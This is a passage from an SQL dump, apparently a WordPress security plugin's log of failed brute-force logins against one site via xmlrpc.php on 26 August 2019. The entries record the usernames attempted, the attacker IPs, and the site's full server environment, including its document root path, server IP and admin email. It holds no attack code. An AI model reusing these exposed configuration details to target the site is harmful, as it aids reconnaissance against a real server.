"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845488.2691\";s:12:\"REQUEST_TIME\";s:10:\"1566845488\";}}','notice','2019-08-26 18:51:30','2019-08-26 18:51:28',17777128,19268960,'https://bintara.com.my/wp-login.php',1,0,'123.31.26.182'),(23198,0,'brute_force','invalid-login::username-test','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"test\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"123.31.26.182\";s:11:\"REMOTE_PORT\";s:5:\"43434\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQqNh90bn5mtr-PXqqzxAAAAEU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845494.4835\";s:12:\"REQUEST_TIME\";s:10:\"1566845494\";}}','notice','2019-08-26 18:51:35','2019-08-26 18:51:34',18208224,19505760,'https://bintara.com.my/xmlrpc.php',1,0,'123.31.26.182'),(23199,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"339\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQqSxTEVi0fEJEHuDZEvAAAAA4\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"2.229.54.98\";s:11:\"REMOTE_PORT\";s:5:\"25827\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQqSxTEVi0fEJEHuDZEvAAAAA4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845515.9029\";s:12:\"REQUEST_TIME\";s:10:\"1566845515\";}}','notice','2019-08-26 18:51:57','2019-08-26 18:51:56',18303232,19504824,'http://bintara.com.my/blog/xmlrpc.php',1,0,'2.229.54.98'),(23200,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQqrRTEVi0fEJEHuDZE1AAAABA\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"77.104.148.205\";s:11:\"REMOTE_PORT\";s:5:\"40202\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQqrRTEVi0fEJEHuDZE1AAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845613.1874\";s:12:\"REQUEST_TIME\";s:10:\"1566845613\";}}','notice','2019-08-26 18:53:36','2019-08-26 18:53:33',18307264,19591824,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'77.104.148.205'),(23201,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQqsg0@TGWC-1tzGX5cQwAAAIs\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"160.153.156.135\";s:11:\"REMOTE_PORT\";s:5:\"39652\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQqsg0@TGWC-1tzGX5cQwAAAIs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845618.6664\";s:12:\"REQUEST_TIME\";s:10:\"1566845618\";}}','notice','2019-08-26 18:53:40','2019-08-26 18:53:38',18303776,19506280,'http://bintara.com.my/blog/xmlrpc.php',1,0,'160.153.156.135'),(23202,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQqwxTEVi0fEJEHuDZE3AAAAAE\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"185.87.123.34\";s:11:\"REMOTE_PORT\";s:5:\"44784\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQqwxTEVi0fEJEHuDZE3AAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845635.1127\";s:12:\"REQUEST_TIME\";s:10:\"1566845635\";}}','notice','2019-08-26 18:53:57','2019-08-26 18:53:55',18302776,19503896,'http://bintara.com.my/blog/xmlrpc.php',1,0,'185.87.123.34'),(23203,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:8:\"HTTP_VIA\";s:40:\"HTTP/1.1 NetScaler1670842890052605601708\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQqyh90bn5mtr-PXqqz0wAAAFY\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"94.73.150.116\";s:11:\"REMOTE_PORT\";s:5:\"14733\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQqyh90bn5mtr-PXqqz0wAAAFY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845642.9277\";s:12:\"REQUEST_TIME\";s:10:\"1566845642\";}}','notice','2019-08-26 18:54:05','2019-08-26 18:54:03',18302296,19504784,'http://bintara.com.my/blog/xmlrpc.php',1,0,'94.73.150.116'),(23204,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"338\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWQrExTEVi0fEJEHuDZE9wAAABQ\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"97.74.24.198\";s:11:\"REMOTE_PORT\";s:5:\"16181\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:42:\"http://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWQrExTEVi0fEJEHuDZE9wAAABQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566845715.2407\";s:12:\"REQUEST_TIME\";s:10:\"1566845715\";}}','notice','2019-08-26 18:55:17','2019-08-26 18:55:15',18307584,19510400,'http://bintara.com.my/wordpress/xmlrpc.php',1,0,'97.74.24.198'),(23205,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 